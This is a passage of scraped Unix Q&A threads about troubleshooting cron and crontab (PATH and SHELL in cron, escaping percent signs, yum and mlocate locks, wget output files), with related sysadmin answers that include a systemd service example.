Notice there is no /etc/cron.d. If you run the following command however you'll see that crontabs requires the following resources:
$ rpm -qp --requires crontabs-1.10-33.el6.noarch.rpm
/bin/bash
/etc/cron.d
config(crontabs) = 1.10-33.el6
rpmlib(CompressedFileNames) <= 3.0.4-1
rpmlib(FileDigests) <= 4.6.0-1
rpmlib(PayloadFilesHavePrefix) <= 4.0-1
rpmlib(PayloadIsXz) <= 5.2-1
Idea #2 - verify cronie package
So this is where the requirement is coming from. I would run the following command to confirm that the package cronie is correctly installed:
$ rpm -V cronie --verbose
......... /etc/cron.d
......... /etc/cron.d/0hourly
......... c /etc/cron.deny
......... c /etc/pam.d/crond
......... /etc/rc.d/init.d/crond
......... c /etc/sysconfig/crond
......... /usr/bin/crontab
......... /usr/sbin/crond
......... /usr/share/doc/cronie-1.4.4
......... d /usr/share/doc/cronie-1.4.4/AUTHORS
......... d /usr/share/doc/cronie-1.4.4/COPYING
......... d /usr/share/doc/cronie-1.4.4/ChangeLog
......... d /usr/share/doc/cronie-1.4.4/INSTALL
......... d /usr/share/doc/cronie-1.4.4/README
......... d /usr/share/man/man1/crontab.1.gz
......... d /usr/share/man/man5/crontab.5.gz
......... d /usr/share/man/man8/cron.8.gz
......... d /usr/share/man/man8/crond.8.gz
......... /var/spool/cron
| How to solve a file path as a failed dependency when installing a RPM? |
1,369,877,415,000 |
I'm running RHEL 5.6. I type
$ crontab -e
and all I see is
Killed
I am, however, able to edit a file (let's say I call it crontab.in) and then type
$ crontab crontab.in
$ crontab -l
and see that it works that way and the entry I placed in crontab.in will run when it should.
So why is crontab -e not working for me?
|
Use strace to find out what is going on.
Instead of crontab -e, type strace crontab -e. That should give a (quite long) list of all the system calls of the running command. Near the end you should find some kind of error indicating what is wrong. (Often it is an open of a file on which you don't have the needed permissions.)
| Cannot edit crontab |
1,645,675,515,000 |
With this cron script I am trying to get Rsync to work
*/1 * * * * /root/backup.sh `date +today/\%M`
And a shell script as the one below
#!/bin/bash -x
PATH=/bin:/usr/bin:/sbin:/usr/sbin
REMOTE="REMOTEADDRESS"
RSYNC=/usr/bin/rsync
# This works
$RSYNC -aqz --exclude-from '/home/root/backups/backup-exclude.txt' /var/www/html $REMOTE:backups/
# This fails
$RSYNC -aqz --exclude-from '/home/root/backups/backup-exclude.txt' /var/www/html $REMOTE:$1/
I am unable to understand why the passed parameter does not get passed correctly to the script. In the log everything looks as it should.
UPDATE
The reason for having cron pass the parameter rather than computing it in the script is to have a backup schedule that allows for:
- a backup each hour, overwritten each day
- a backup each day, overwritten each month
- a persistent backup each month
The error when passing the parameter is that rsync cannot mkdir on the remote server. It can with any static path. The log shows the correct directory being passed when using the current cron entry.
|
You must ensure that the directory where you are trying to copy to (the dest/dir) exists in the remote computer:
rsync -aqz ./ user@host:dest/dir
At minimum, all the directories (except the last one) should already exist.
That is the same behavior as mkdir: mkdir will only create the last directory (by default, the -p option can change that).
That is: rsync will fail unless /home/user/dest/dir exists on the remote computer.
That is with relative directories.
The same also happens with absolute directories (ones that start with an /):
rsync -aqz ./ user@host:/home/user/dest/dir
The exact same rule but the directory is not assumed to be at the user home directory but could be anywhere (the user must have permissions to write to it, of course).
In additional testing I found that if rsync is going to use a directory like:
newdir/testdir
At least the directory newdir must exist. That is exactly the same as mkdir does. A mkdir newdir/testdir will fail if there is no newdir dir.
I tested it with the same script as you report:
using with a fixed dir,
a given dir on a parameter,
a given dir on the script $1 parameter
all the above repeated with and without cron.
In all cases, missing the initial directory of a two parts directory gets rsync to fail.
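The rule is easy to verify locally with mkdir alone, since rsync imposes exactly the same constraint on the remote side:

```shell
#!/bin/sh
# Local demonstration of the rule above using mkdir, which imposes the
# same constraint rsync does on the remote destination: the parent
# directory must already exist.
tmp=$(mktemp -d)
mkdir "$tmp/newdir/testdir" 2>/dev/null \
  && echo "created" || echo "fails: newdir is missing"
mkdir -p "$tmp/newdir/testdir" && echo "created with -p"
```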
| Why I can't pass a parameter from cron to shell script [closed] |
1,645,675,515,000 |
I want to use crontab to run a script for yum updates. The problem is that it seems to run the script once, then yum is just stuck for a while (and can't be run again). I get this error:
$ sudo yum update
Existing lock /var/run/yum.pid: another copy is running as pid 5248.
Another app is currently holding the yum lock; waiting for it to exit...
The other application is: yum
Memory:...
Started:... 5 day(s) ago...
State: Sleeping, pid: 5248
This is what I place in crontab:
$ sudo crontab -e
0 4 * * *
/usr/local/bin/yum_updates.sh
This is what's in the script:
$ sudo vim /usr/local/bin/yum_updates.sh
#!/bin/bash
yum makecache
yum -y update
yum -y upgrade
mandb
I considered yum-cron, but I've looked over the config file and it doesn't seem as customizable as crontab (i.e. I can't run security updates one day and full updates a different day), but correct me if I'm wrong, I haven't used yum-cron that much.
I would like to know how to stop this error, so I can run scripts using crontab without it holding the program hostage or getting the process stuck after only running once.
|
Great answers, but I found I could just make each type of yum update its own crontab entry like so:
$ sudo crontab -e
#Full system update midnight every Monday and Tuesday
0 0 * * 1,2 /usr/bin/yum -y update
10 0 * * 1,2 /usr/bin/yum -y upgrade
#Security updates everyday at 2AM
0 2 * * * /usr/bin/yum -y update --security
It takes more lines, but seems to work just fine. Note that each entry should have a blank line below it, especially the last entry.
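A hedged variant of the entries above: wrapping each command in flock(1) makes overlapping runs queue on a shared lock file instead of colliding on yum's own lock (the lock path and timeout are illustrative):

```
0 0 * * 1,2 /usr/bin/flock -w 600 /var/lock/yum-cron.lock /usr/bin/yum -y update
10 0 * * 1,2 /usr/bin/flock -w 600 /var/lock/yum-cron.lock /usr/bin/yum -y upgrade
0 2 * * * /usr/bin/flock -w 600 /var/lock/yum-cron.lock /usr/bin/yum -y update --security
```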
| Yum with crontab - "Another app is currently holding the yum lock" |
1,645,675,515,000 |
I am running Kubuntu 18.04, and have a simple script to reset the plasmashell every time after suspend/lockscreen since there's a known bug that corrupts folder/file names upon returning from suspend.
#!/bin/bash
dbus-monitor --session "type='signal',interface='org.freedesktop.ScreenSaver'" |
while read x; do
case "$x" in
*"boolean true"*) echo SCREEN_LOCKED;;
*"boolean false"*) killall plasmashell | kstart plasmashell;;
esac
done
This script works fine when run from a terminal.
However, when placed in crontab to load at reboot, the process is not started and cannot be found in the htop list.
Using crontab -e as the user I've added this in the file
@reboot /home/user/Documents/IK_Scripts/IK_ResetPlasma_BASH.sh > /home/user/Desktop/LogF
The LogF is generated after reboot, but the script does not appear to be loading.
Is this the correct way of having this script run constantly as a background process, or is there a better way of doing that? In essence, I would like this script to load after reboot and run in the background for whenever I return from the lock screen.
Any help will be greatly appreciated!
|
Of course, the correct way is always the easiest and most obvious way...
In this case in Kubuntu 18.04 go to:
System Settings --> Startup and Shutdown --> Autostart --> Select the script!
Don't forget to make the script file executable!
Works like a charm, and the process takes virtually no memory as it runs in the background; every time I resume the laptop from suspend, the folder/file names are not corrupted!
| Kubuntu 18.04, cron task does not load @reboot |
1,645,675,515,000 |
I am trying to repeatedly execute python script(s) using cron. I have written a shell script that calls that/these python script(s). I have made the shell script executable and it works perfectly, both in the terminal and just by clicking to execute.
I have changed the crontab to call my shell script at specific, usually one or two minute, intervals to see if it is working. However, it seems my script is not being executed properly.
My python script is a long one and it also calls local python functions. Nevertheless, I created a short python program as well as a shell script to call it, for the purpose of finding out whether cron works, and it seems that it is being called as intended.
Why is my python/shell script not being executed properly? If I call a shell script, do I still need to include the path for cron to see it?
My crontab:
20 13 * * * /my/full/path/to/the/shell_script.sh
My shell script/file:
#!/bin/bash
cd /full/path/to/the/python_script_folder
sudo python3 python_script.py argument
RPi3 /var/log/syslog:
Jan 23 20:13:01 raspberrypi cron[477]: (pi) RELOAD (crontabs/pi)
Jan 23 20:13:01 raspberrypi CRON[3851]: (root) CMD (/etc/myDevices/crontab.sh)
Jan 23 20:13:01 raspberrypi CRON[3854]: (pi) CMD (/my/full/path/to/the/shell_script.sh)
Any help is appreciated. If you need any additional information, please let me know. Thank you.
|
As @thrig mentioned - sudo is probably asking for password and bash -x will give additional info of what is executed and what is the output.
First of all, it's a good practice to redirect cron output, e.g.
20 13 * * * /my/full/path/to/the/shell_script.sh > ${HOME}/cron.log 2>&1
This will give you output of the script logged in the file.
I would:
place the entry in crontab of the user that needs to run it.
drop the wrapper and set the command as 'python3 /path/to/script.py args'
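Putting both suggestions together, the resulting crontab entry might look like this (the interpreter path, script path and log location are illustrative, not taken from the question):

```
20 13 * * * /usr/bin/python3 /full/path/to/the/python_script_folder/python_script.py argument >> ${HOME}/cron.log 2>&1
```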
| Cron calling a shell script that calls a python script [RPi3] |
1,645,675,515,000 |
Details
OS: Solaris 10 , update 11
HW: M5-32 LDOM, V490, IBM x3650, T5240, VMware virtual machine, etc...
EDITOR=vi
term=vt100
tmp directory=/var/tmp
cron shell=/sbin/sh
My shell=/bin/bash
Issue
A very interesting error occurs when attempting to modify the crontab via crontab -e.
If I use crontab -e with vi as my editor to verify and check syntax, search for a non-existent string, and then try to save, it will puke back and tell me that an error has occurred, even if no changes were made.
Example
admin@server# export EDITOR=vi
admin@server# crontab -e
In command mode, search for a non-existent string like "foobar123". After receiving the "Pattern not found" message, attempt to :wq and you'll receive...
The editor indicates that an error occurred while you were
editing the crontab data - usually a minor typing error.
Edit again, to ensure crontab information is intact (y/n)?
('n' will discard edits.)
If you are cheeky and choose to go right back in and attempt to save, it will now save sans error. This is repeatable on all types of Solaris, from a VMware guest to an M5-32 LDOM to a physical V490. I am curious why cron would interpret a search for a non-existent string as an error, but not, say, visudo.
A related note: Solaris 11 will not produce this error, which raises the question: if this is some sort of POSIX specification, why would it apply to Solaris 10 and not 11?
|
Not having the source to Solaris 10 or Solaris 11, I can't say for sure, but I suspect that Thomas Dickey is on the right track, based on his findings with vim.
I tracked down the IllumOS source where a search for errcnt in the ex/vi directory shows that errcnt is only ever incremented, and errcnt is used as the return code from main().
Thus, any failure that increments errcnt in vi will "bubble up" to the crontab command, where the IllumOS source for crontab indicates that it will be unhappy with anything other than zero.
Notice also the comment in crontab.c!
311 ret = system(buf);
...
327 if ((ret) && (errno != EINTR)) {
328 /*
329 * Some editors (like 'vi') can return
330 * a non-zero exit status even though
331 * everything is okay. Need to check.
332 */
| Error while searching for non-existent string with EDITOR=vi crontab -e |
1,645,675,515,000 |
I have a computer with Ubuntu Server 15.10 installed on it that sits in the same room I am in. I use it just as a Minecraft server, map renderer and for whatever other PHP scripts I want to run on a schedule within my house. I have a few cronjobs set up to render the map at 3am, back up the game server at 2am, and restart Minecraft if the server dies (cron runs every minute and checks whether the process is running; if not, it starts it). All this works great, except for the fact that my crontab disappears after a day or so.
I am setting it on my regular user account I login with (some of the things don't run when running as root). I edit it with crontab -e which opens in vim. I can list it with crontab -l, I even tried resetting it with crontab -r and manually adding my lines again at the bottom but whatever I do it reverts back to a single line I entered ages ago which I now don't even want running.
Any idea what could be causing this?
|
The problem came from this Minecraft backup script. It was set to create the cronjob itself but it would just wipe the entire crontab for whatever reason. Reporting it on their issue tracker.
| Crontab resetting itself |
1,645,675,515,000 |
I have to write a shell script that has to do the following tasks:
- every 5 seconds it saves:
  - how many users are using joe and/or vi;
  - if someone was using vi at the last check but isn't using it anymore, the program should print something about that user, and if he is in your group it should send him a mail;
- every minute it prints:
  - the last minute's statistics about the usage of joe and vi;
  - the change relative to the average usage (increased or decreased).
Any suggestions?
|
a=`ps -ef | grep -c "[j]oe"`
b=`ps -ef | grep -c "[v]i"`
echo `date +"%Y%m%d %T"` $a $b >> somelogfile
(The bracket trick keeps grep from counting itself, and %Y%m%d gives year-month-day; %M and %D would mean minute and mm/dd/yy respectively.)
Put this under crontab.
Also, in /etc/profile put something like the following (bash alias syntax):
alias vi='vi; mail -s "some message" mailbox'
| bash script - supervisor program |
1,645,675,515,000 |
I'm trying to run a script that calls zenity from a crontab and it fails. The script works well from the command line.
I do pass the DISPLAY in the crontab:
* * * * * DISPLAY=:1 bin/myscript.sh > /tmp/debug.txt 2>&1
In the debug logs, I get:
This option is not available. Please see --help for all possible usages.
Trying to remove the options one by one, I found that the problematic one is "--text", because the following doesn't work:
zenity --warning --title "Fais gaffe" --text "Bientôt plus de batterie"
But the following does:
zenity --warning --title "Fais gaffe"
|
It turns out that the issue is in the content of the text.
I'm not sure what the difference is between running the script in the command line or in crontab, but the ô is causing the issue.
Replacing it by a o, the command works fine in the crontab too:
zenity --warning --title "Fais gaffe" --text "Bientot plus de batterie"
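A plausible explanation (an assumption on my part, not verified in the answer) is the locale: cron runs jobs with a minimal environment, usually without a UTF-8 LANG, so multi-byte characters like ô can trip up argument parsing. Setting a locale at the top of the crontab may keep the accent working; the exact locale value is illustrative:

```
LANG=en_US.UTF-8
* * * * * DISPLAY=:1 bin/myscript.sh > /tmp/debug.txt 2>&1
```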
| zenity failing in crontab but working in shell |
1,645,675,515,000 |
I want to run a script every day at 10:25 (exact hour is not important) on my Raspberry Pi (running Raspbian Jessie).
With that line : 25 10 * * * /home/pi/test.sh
it gave no results, no output and no activity log.
I tried with * * * * * /home/pi/test.sh and there magic happens ! It worked fine, producing CMD (/home/pi/test.sh) in the cron logs, and creating the desired output file.
The script I used for test purposes:
#!/bin/bash
echo `date` > /home/pi/test.txt
Does someone have any idea why cron doesn't run the script?
|
From the crontab manpage
Commands are executed by cron(8) when the minute, hour, and month of
year fields match the current time, and at least one of the two day
fields (day of month, or day of week) match the current time
You are required to have one of the day fields. If you want this to run at 10:25 every day, just use
25 10 * * 0-6 /home/pi/test.sh
EDIT: The day-field explanation above is actually incorrect, since * in both day fields already matches every day. We figured out it was a system time issue, so double-check your system time; your cron daemon may be operating in a different time zone (e.g. UTC). Since the script worked when you set all the fields to *, we know the actual logic is working.
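When debugging this kind of problem, a few quick commands make the comparison between the system's idea of time and the schedule concrete (timedatectl only exists on systemd-based machines, hence the guard):

```shell
#!/bin/sh
# Compare local time, UTC, and the configured time zone against the
# schedule written in the crontab entry.
date
date -u
timedatectl 2>/dev/null | grep -i 'time zone' || true
```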
| Why does crontab works with wildcards (*) but not with numbers? |
1,645,675,515,000 |
I added a new cronjob with a user (SUSE LINUX Enterprise Server 9.4):
# su - XXX
$ crontab -e
and this is what I added:
* * * * * echo `date` >> /home/XXX/a.txt
but a.txt isn't created... it will ONLY be created when root restarts crond...
Q: Why?
UPDATE:
machine:~ # chage -l XXX
Minimum: 1
Maximum: 99999
Warning: 7
Inactive: -1
Last Change: Apr 11, 2011
Password Expires: Never
Password Inactive: Never
Account Expires: Never
machine:~ #
so neither the user nor their password has expired.
UPDATE:
cron version:
cron-3.0.1-920.18
and I tried to add a new crontab to the root user... it's the same :D the new root cronjobs aren't running either... :D it looks like "crontab -e" doesn't reload crond or something...
|
strace crontab -e
solved it... dunno how, but it works now. All I wanted to do was check the crontab's low-level "operations"...
| Why are new cronjobs ignored unless crond is restarted in SLES? [closed] |
1,400,072,087,000 |
I am using the line below to run a page every hour on my Virtualmin install on CentOS 7
wget https://domain.tld/index.php?page=cron > /dev/null 2>&1
but it creates the files below every hour when the cron runs
index.php?page=cron
index.php?page=cron.1
index.php?page=cron.2
etc.
Please let me know how to avoid the creation of these files.
|
wget, by default, saves the fetched web page in a file whose name corresponds to the document at the end of the URL (it does not send it to its standard output). If that file already exists, it adds a number to the end of the name.
If you don't want to save the document, then specify that you'd like to save it in /dev/null:
wget -O /dev/null 'https://domain.tld/index.php?page=cron' >/dev/null 2>&1
or
wget --output-document=/dev/null --quiet 'https://domain.tld/index.php?page=cron'
It's also a good idea to quote the URL as URLs sometimes contain characters that may be interpreted a filename globbing character or command terminators by the shell (like & and [ and ] etc.).
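If curl is installed, an equivalent hourly entry could look like this (curl writes the fetched document to stdout by default, so nothing is saved to disk):

```
0 * * * * curl -fsS 'https://domain.tld/index.php?page=cron' > /dev/null 2>&1
```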
| How to prevent text file creation by wget in cron job run? |
1,400,072,087,000 |
I want to name a file according to the parity of the day of the week.
In the terminal the following works: $(($(date +\%u)%2))
But this doesn't work in cron (I suspect evaluation of mathematical expressions doesn't work).
How can I make this working in cron?
|
You escaped one percent sign and not the other:
$(($(date +\%u)%2))
^
HERE
All percent signs in a crontab entry need to be escaped, because % has special meaning there. To quote from the crontab(5) manpage:
The entire command portion of the line, up to a newline or % character, will be executed by /bin/sh or by the shell specified in the SHELL variable of the crontab file. Percent-signs (%) in the command, unless escaped with backslash (\), will be changed into newline characters, and all data after the first % will be sent to the command as standard input.
Admittedly, that paragraph could be worded better.
So that needs to be:
$(($(date +\%u)\%2))
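Run through a normal shell (no cron, so no escaping needed), the expression shows what the entry is meant to compute: the parity of the ISO weekday number.

```shell
#!/bin/sh
# date +%u gives 1 for Monday through 7 for Sunday; the modulo yields
# 1 on odd-numbered weekdays and 0 on even-numbered ones.
parity=$(( $(date +%u) % 2 ))
echo "$parity"
```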
| Evaluate mathematic expression in cron |
1,400,072,087,000 |
I know about nohup. It prevents processes from dying after a hang-up.
What I want is my user crontabs to run even if my session has timed out when they are supposed to run. I believe I need the user to be still logged on for that to happen.
How do I make sure that the user's crontab are run whatever if he's logged on or not?
Do I need to make sure the user is actually logged on?
Should I use a system crontab instead?
Any other solutions?
|
cron runs whether you are logged-in or not.
It's a daemon that checks items in the crontab (cron table) and runs them at the appointed time(s).
If you had to be logged-in to do it, it would be pretty unhelpful - more like running a process in the background after a sleep, or in a loop.
| Do I need to keep an SSH session alive for cron to run? |
1,400,072,087,000 |
I have a script that has a "while true" loop. And I want to run that script from cron every minute, so that when the process is killed (or fails, no matter why) cron will run the script again.
But when I check ps -aef --forest, there is my process run by /usr/sbin/CROND -n. Isn't this bad for cron or the system? Or maybe I should do it differently?
|
Maybe a short example for a systemd service will do.
This is our infinite script, location /path/to/infinite_script , executable bit set:
#!/bin/bash
while ((1)) ; do
date >> /tmp/infinite_date
sleep 2
done
Now we need to define a service file:
[Unit]
#just what it does
Description= infinite date service
[Service]
#not run by root, but by me
User=fiximan
#we assume the full service as active one the script was started
Type=simple
#where to find the executable
ExecStart=/path/to/infinite_script
#what you want: make sure it always is running
Restart=always
[Install]
#which target wants this to run - default.target just means it is loaded by default
WantedBy=default.target
and place it in /etc/systemd/system/infinite_script.service
Now load and start the service (as root):
systemctl enable infinite_script.service
systemctl start infinite_script.service
The service is running now and we can check its status
systemctl status infinite_script.service
● infinite_script.service - infinite date service
Loaded: loaded (/etc/systemd/system/infinite_script.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2019-05-28 14:18:52 CEST; 1min 33s ago
Main PID: 7349 (infinite_script)
Tasks: 2 (limit: 4915)
Memory: 1.5M
CGroup: /system.slice/infinite_script.service
├─7349 /bin/bash /path/to/infinite_script
└─7457 sleep 2
Mai 28 14:18:52 <host> systemd[1]: Started infinite date service.
Now if you kill the script (kill 7349 - main PID) and check the status again:
● infinite_script.service - infinite date service
Loaded: loaded (/etc/systemd/system/infinite_script.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2019-05-28 14:22:21 CEST; 12s ago
Main PID: 7583 (infinite_script)
Tasks: 2 (limit: 4915)
Memory: 1.5M
CGroup: /system.slice/infinite_script.service
├─7583 /bin/bash /path/to/infinite_script
└─7606 sleep 2
Mai 28 14:22:21 <host> systemd[1]: Started infinite date service.
So note how it was just restarted instantly with a new PID.
And check the file ownership of the output:
ls -l /tmp/infinite_date
-rw-r--r-- 1 fiximan fiximan 300 Mai 28 14:31 infinite_date
So the script is run by the correct user as set in the service file.
Of course you can stop and disable the service:
systemctl stop infinite_script.service
systemctl disable infinite_script.service
EDIT:
A few more details: a user's personal services can (by default) be placed in $HOME/.config/systemd/user/ and managed accordingly with systemctl --user <commands>. No root needed just like with a personal crontab.
| How should I run a cron command which has forever loop? |
1,400,072,087,000 |
I would like cron to run a script from a specific shell (Zsh). I thought the following would work:
00 02 * * * exec zsh; /path/to/script.sh
but apparently it doesn't. Why?
This also made me wonder: how do I find out what shell and init scripts cron runs prior to running the entry in crontab?
|
How about:
00 02 * * * exec /usr/bin/zsh /path/to/script.sh
That will tell zsh to run the script. If you want it to be run by zsh no matter what, just add the shebang at the start:
#!/usr/bin/zsh
the_rest
| Running a cron job from another shell |
1,400,072,087,000 |
I am creating a crontab job that merges the 15-minute clips from my security camera into one file (24 hours long) and then deletes the original clips.
avimerge -o /media/jmartin/Cams/video/Full_$(date +%F --date "Yesterday") -i /media/jmartin/Cams/video/$(date +%F --date "Yesterday")* # Converts files from the past 24 hours into one .avi
rm /media/jmartin/Cams/video/$(date +%F --date "Yesterday")* # Removes old clips that have already been compressed
My question is: what is the danger of using the $(date ...) substitution? Could something possibly happen where it deletes all files in /video/? What would you recommend as a safer alternative?
Example filenames (Yes, those are spaces in the filename):
2016-04-25 00:00:01.avi
2016-04-25 00:15:02.avi
2016-04-25 00:30:02.avi
2016-04-25 00:45:01.avi
|
Two things jump out:
You have no checking for failure of the substitution
There is a race condition if the date changes between uses of the date command.
You could solve them both like this:
#!/bin/bash
# Exit if any command fails
set -e
dir='/media/jmartin/Cams/video'
day=$(date +%F --date Yesterday)
# Combine files from the past 24 hours into a single AVI file
avimerge -o "$dir/Full_$day" -i "$dir/$day"*
# Remove old clips that have already been compressed
rm "$dir/$day"*
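To see why the set -e guard matters, here is a tiny demonstration in which `false` stands in for a failing date command:

```shell
#!/bin/sh
# With -e, the shell stops at the failed command substitution and
# never reaches the echo that stands in for the rm step.
result=$(sh -e -c 'day=$(false); echo "rm would have run on $day"' 2>/dev/null \
         || echo "aborted before rm")
echo "$result"
```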
| Dangers of using rm command with variables |
1,400,072,087,000 |
I have a virtual server (debian) and the clock fails to sync from time to time (probably because i save/restore state with vboxheadlesstray).
To fix this issue I run dpkg-reconfigure ntp && ntpq -p, it works when I run it as root, but doesn't work with cron. I have added it in crontab -e (as root user) and is using this line:
1 * * * * dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
My ordinary user gets mail about it saying /bin/sh: 1: dpkg-reconfigure: not found. Why is my ordinary user getting the mail and not root, and what do I need to change to make it work?
|
In Debian, dpkg-reconfigure is located under /usr/sbin, and root obviously has it in his $PATH, but cron limits $PATH to /usr/bin:/bin, even for root.
See man 5 crontab :
Several environment variables are set up automatically by the cron(8) daemon.
SHELL is set to /bin/sh, and LOGNAME and HOME are set from the /etc/passwd line of the crontab's owner.
PATH is set to "/usr/bin:/bin". HOME, SHELL, and PATH may be overridden by settings in the crontab;
LOGNAME is the user that the job is running from, and may not be changed.
So you would have to modify your crontab :
giving full path :
1 * * * * /usr/sbin/dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
or with modified $PATH :
PATH=/usr/bin:/bin:/usr/sbin
1 * * * * dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
It would work, but it would not be clean :p
You'd better follow the above recommendation, assuming you have a working ntp daemon, or just use this job instead:
10 * * * * /usr/sbin/ntpdate >/dev/null 2>&1
| dpkg-reconfigure: not found when running in cron |
1,400,072,087,000 |
I have the following command set used to update all my WordPress sites in my CentOs shared-hosting partition on my hosting provider's platform (via daily cron).
The wp commands inside the pushd-popd set are from WP-CLI, a command-line tool used for various shell-level actions on WordPress websites.
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all
wp core update
wp language core update
wp theme update --all
popd
fi
done
The directory public_html is the directory in which all website directories are located (each website usually has a database and a main file directory).
Given that public_html has some directories which are not WordPress website directories, WP-CLI would return errors regarding them.
To prevent these errors, I assume I could do:
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all 2>myErrors.txt
wp core update 2>myErrors.txt
wp language core update 2>myErrors.txt
wp theme update --all 2>myErrors.txt
popd
fi
done
Instead of writing 2>myErrors.txt four times (or more), is there a way to ensure that all errors, from every command, go to the same file, specified in one place?
|
The > file operator opens the file for writing but truncates it initially. That means that each new > file causes the content of the file to be replaced.
If you want myErrors.txt to contain the errors of all the commands, you need either to open that file only once, or use > the first time and >> the other times (which opens the file in append mode).
Here, if you don't mind the pushd/popd errors to also go to the log file, you can redirect the whole for loop:
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all
wp core update
wp language core update
wp theme update --all
popd
fi
done 2>myErrors.txt
Or you could open the log file on a fd above 2, 3 for instance, and use 2>&3 (or 2>&3 3>&- so as not to pollute commands with fds they don't need) for each command or group of commands you want to redirect to the log file:
for dir in public_html/*/; do
if pushd "$dir"; then
{
wp plugin update --all
wp core update
wp language core update
wp theme update --all
} 2>&3 3>&-
popd
fi
done 3>myErrors.txt
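The difference between > and >> is easy to demonstrate with a scratch file:

```shell
#!/bin/sh
# ">" truncates on open, so only the last write survives;
# ">>" appends, so both lines survive.
f=$(mktemp)
echo one  > "$f"; echo two  > "$f"
trunc=$(wc -l < "$f")
echo one  > "$f"; echo two >> "$f"
append=$(wc -l < "$f")
echo "'>' kept $trunc line(s); '>>' kept $append"
rm -f "$f"
```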
| Redirect all lines of code to the same file in a single line |
1,400,072,087,000 |
Let's say I send an email, containing a link to my website, to someone that I really hope he'll visit it (fingers-crossed style):
http://www.example.com/?utm_source=email392
or
http://www.example.com/somefile.pdf?utm_source=email392
How to make Linux trigger an action (such as sending an automated email to myself) when this URL is visited, by regularly examining /var/log/apache2/other_vhosts_access.log?
I can't do it at the PHP level because I need to do it for various sources/websites (some of them use PHP, some don't and are just links to files to be downloaded, etc.). Even for the websites using PHP, I don't want to modify every index.php to do it from there; that's why I prefer an Apache log parsing method.
|
Live log monitoring using bash process substitution:
#!/bin/bash
while IFS='$\n' read -r line;
do
# action here, log line in $line
done < <(tail -n 0 -f /var/log/apache2/other_vhosts_access.log | \
grep '/somefile.pdf?utm_source=email392')
Process substitution feeds the read loop with the output from the pipeline inside <(...). The log line itself is assigned to variable $line.
Logs are watched using tail -f, which outputs lines as they are written to the logs. If your log files are moved periodically by logrotate, add --follow=name and --retry options to watch the file path instead of just the file descriptor.
Output from tail is piped to grep, which filters the relevant lines matching your URLs.
| Trigger an action when an URL has been visited |
1,400,072,087,000 |
[srinkann@sjc-ads-440 ~]$ crontab -e
no crontab for srinkann - using an empty one
/bin/sh: /usr/bin/vi: No such file or directory
crontab: "/usr/bin/vi" exited with status 127
[srinkann@sjc-ads-440 ~]$
In Google, I found the solution below, but I don't have permission to do that.
ln -s /bin/vi /usr/bin/vi
|
I suppose that you can still use vi directly. There is a workaround:
crontab -l > crontab.txt
vi crontab.txt
crontab crontab.txt
Make your modifications in crontab.txt between the second and third steps.
| Not able to schedule tasks in crontab |
1,400,072,087,000 |
I remember messing around with crontab and setting up email capabilities on a server many months back, and now all of a sudden I'm getting the following email:
EMAIL HEADER:
from: root <[email protected]>
to: root
date: Thu, Dec 5, 2013 at 6:48 AM
subject: Cron <root@server-ip> test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
mailed-by: gmail.com
BODY:
/etc/cron.daily/mlocate:
/usr/bin/updatedb.mlocate: `/var/lib/mlocate/mlocate.db' is locked (probably by an earlier updatedb)
run-parts: /etc/cron.daily/mlocate exited with return code 1
|
This is a cron job that updates the indexes for mlocate, which is used when you run locate on your system to find files. This index allows the program to quickly find files without traversing the filesystem (which is much more expensive, because it's not optimised for that use case). For some reason, the lock file that stops more than one database update happening at one time still remains, perhaps because mlocate was terminated unexpectedly and wasn't able to remove the lock file.
To fix this:
Check that there are no updatedb.mlocate processes running (pgrep -x 'updatedb\.mlocate');
If one is running, either wait for it to finish, or if you think it is stuck, terminate it (pkill -x 'updatedb\.mlocate', perhaps using more violent signals if there is no response);
Remove the lock if none are running (rm /var/lib/mlocate/*.lock).
| Mysterious automated emails |
1,400,072,087,000 |
I am trying to add following command to crontab:
I=1; for X in $(/bin/ls -r /var/tmp/*); do [ $((I++)) -le 28 ] && echo "lower" || echo "higher"; done
When executed on the command line (in bash), the command works fine. But when I add the line into crontab and when executed, cron complains:
/bin/sh: 1: arithmetic expression: expecting primary: "I++"
Do I need to use different syntax in cron ?
EDIT1:
I have replaced sh with bash in my /etc/crontab:
SHELL=/bin/bash
I have restarted cron, but following cron line still does not execute:
(I=1; for X in $(/bin/ls -r /var/tmp/*); do [ $((I++)) -le 28 ] && echo "lower" || echo "higher"; done)
the error suggests, that it is still being interpreted with /bin/sh instead of /bin/bash:
/bin/sh: 1: arithmetic expression: expecting primary: "I++"
|
Cron, if I'm not mistaken, defaults to /bin/sh. Check /etc/crontab for the line SHELL=. It is likely set to /bin/sh (dash on Debian/Ubuntu). I believe you can set SHELL=/bin/bash in your own user crontab file (the one edited by crontab -e). Or move the command into a script with a #!/bin/bash shebang and call that script from cron.
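If editing the SHELL line isn't convenient, or you want bash for just this one entry, a per-entry workaround is to hand the command to bash explicitly. A sketch (the loop is the one from the question):

```shell
# dash rejects $((I++)); running the command under bash -c avoids that
bash -c 'I=1; for X in $(/bin/ls -r /var/tmp/*); do [ $((I++)) -le 28 ] && echo "lower" || echo "higher"; done'
```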
| cron: bash syntax not working |
1,400,072,087,000 |
On Debian and its derivatives, how shall we understand the following seemingly contradictory facts:
/etc/crontab and /etc/cron.d/* have a user field, meaning that a job is running as the user (either root or nonroot).
the jobs in /etc/crontab and /etc/cron.d/* are system jobs not user-specific jobs?
If you want to run a job either as root or as a nonroot user, where would you add the job: /etc/crontab, /etc/cron.d/*, or /var/spool/cron/crontab/<user>?
Stephen's comment at How are files under /etc/cron.d used? clarifies a lot, but I still can't figure that out
A system job is a job which applies to the whole system. A user-specific job is a job run on behalf of a specific user; typically, tasks which the user would do manually while logged in, but which he/she wishes to perform periodically and automatically — e.g. backups of specific files, or refreshes of remote development repositories, or mail processing, or mirroring web sites
Thanks.
|
I tend to use the various cron configuration files as follows:
/var/spool/cron/crontab is used by “real” users (i.e. users corresponding to humans using the system), edited using crontab -e;
/etc/cron.d is used for package-provided cron jobs, which can run as a “system” user (e.g. logcheck for logcheck’s cron jobs); as mentioned in answers to some of your other questions on the topic, /etc/cron.d is intended for use by packages, at least on Debian-based systems;
